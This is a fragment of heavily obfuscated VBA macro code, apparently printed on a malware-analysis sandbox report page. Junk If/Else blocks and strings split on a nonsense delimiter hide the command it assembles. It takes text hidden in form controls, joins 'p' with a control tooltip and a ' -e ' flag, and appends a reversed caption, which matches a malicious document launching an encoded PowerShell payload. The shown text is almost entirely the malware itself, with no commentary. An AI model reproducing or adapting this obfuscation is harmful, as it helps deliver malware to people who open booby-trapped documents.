Hkhoufmlku = VBA.CVar(Join(Split(Skfqtnifjm, "}&*$**(){"), NoLineBreakAfter))
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
End Function
Function Clmffidfqkk()
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
nnannauwe = "}&*$**(){ }&*$**(){-}&*$**(){e}&*$**(){ }&*$**(){"
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Bczvznvjp = ChrW(Int(wdKeyP))
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Ruvtgtqjujxaw = Bczvznvjp + Negooxrrapdb.Pjfyvvzebdvoo.ControlTipText + nnannauwe
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
dkhiqwhnkew = Negooxrrapdb.Gdewqoxmwyilf.Pages(0).Caption
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Clmffidfqkk = Hkhoufmlku(Ruvtgtqjujxaw + StrReverse(dkhiqwhnkew))
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.